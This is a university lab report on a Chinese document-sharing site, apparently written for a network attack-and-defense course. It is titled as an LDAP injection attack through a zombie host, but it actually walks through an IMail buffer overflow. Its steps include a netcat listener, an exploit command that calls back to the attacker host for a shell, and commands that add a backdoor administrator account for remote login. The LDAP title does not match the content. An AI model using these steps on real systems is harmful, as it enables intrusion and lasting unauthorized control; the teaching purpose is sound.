欢迎来到天天文库
浏览记录
ID:59193640
大小:118.51 KB
页数:5页
时间:2020-10-30
《利用肉机攻击目标机LDAP注入漏洞攻击.doc》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库。
1、河南工业大学网络攻防实验《利用肉机攻击目标机LDAP注入漏洞攻击》姓名:孙桂宾学号:200928020223实验目的:黑客利用肉机攻击目标机开放的端口,利用肉机的目的是隐藏自己的身份,以免被发现。 LDAP是轻量目录访问协议,它是基于X.500标准的开放式标准协议。当一个Web应用程序没有正确消除用户提供的输入信息,是很有可能被攻击者改变LDAP语句的设置。 危害 攻击者能够修改LDAP声明,这一进程将运行与组件执行的命令相同的权限。(如数据库服务器、Web应用服务器、Web服务器等)。这可能会导致严重的安全问题,如可以
2、查询权限外信息的权利,修改或删除LDAP树里面的任何信息。BUGTRAQ ID: 25762 IPSwitch IMail是一款基于Windows的邮件服务程序。 IPSwitch IMail的iaspam.dll中存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制服务器。 相关细节: loc_1001ada5 ==> 注意动态调试时候注意加载基址的不同。mov eax, [ebp+var_54]mov ecx, [eax+10c8h]push ecx ; char *
3、mov edx, [ebp+var_54]mov eax, [edx+10d0h]push eax ; char *call _strcpyadd esp, 8jmp loc_1001a6f0 这里strcpy的两个buffer,src和dst的指针是直接从堆里读出来的,而之前没有做任何检查,所以发送恶意邮件到服务器(SMD文件),然后在其后的偏移处控制这两个地址,就可以拷贝任意字符串到任意内存。环境配置:1、目标机为:192.168.11.612、本地机为:19
4、2.168.11.663、目标机的389端口即ldap服务打开4、本地机的c盘下存在imail、nc软件,imail为栈溢出漏洞,可以利用该漏洞攻击对方,nc为小软件实现监听本地机器的未占用端口。5、本地机的c盘下存在mstsc文件实验相关知识:1、端口对应的服务:25SMTP邮件42WINS110POP33389终端服务389LDAP服务2、如何看本地端口?使用命令:netstat-an3、黑客、肉机、目标机示意图:肉机1在内网中,IP地址为:192.168.11.100Internet出口地址:202.29.12.100则
5、:DMzadministrator看到的应为即内部地址:192.168.11.100但从cmd中的命令行看到的是internet出口地址202.29.12.100实验步骤:1、本地机运行cmd命令进入命令提示状态;提示结果:2、测试目标机的端口389:使用命令:telnet目标机端口具体为:telnet192.168.11.61389提示结果:当目标机389端口打开时显示黑屏,则认为目标机的389端口已打开。3、监听目标机的端口81(80一般不用)使用命令:nc–l–p81//其中:-l表示监听,-p表示端口,81和80为本地
6、机器的端口。提示结果:4、另外打开一个命令窗口,因为nc命令一直在监听81端口方法:运行cmd提示结果:5、输入imail命令,进入对方机器使用命令:imail7_8–t0–h目标机–i肉机–p81//其中:-h表示目标机,-i表示肉机具体为:imail7_8–t0–h192.168.11.61–i192.168.11.66–p81提示结果:6、在目标机中加入用户使用命令:netuser用户名密码/add具体为:netuserxun123/add提示结果:7、将所加用户加入组本地组使用命令:netlocalgroupadmin
7、istrators用户名/add具体为:netlocalgroupadministratorsxun/add提示结果:8、运行mtstc文件,连接目标机,进行用户名登陆,并且进行克隆账号使用命令:mtstc提示结果:9、进入对方机器点击连接按钮即可实验总结:这个实验类似于账号克隆,利用LDAP漏洞,用肉机攻击目标机,通过远程登录到目标机,在克隆账号,以便可以都可以远程控制目标机,来达到自己的目的。
此文档下载收益归作者所有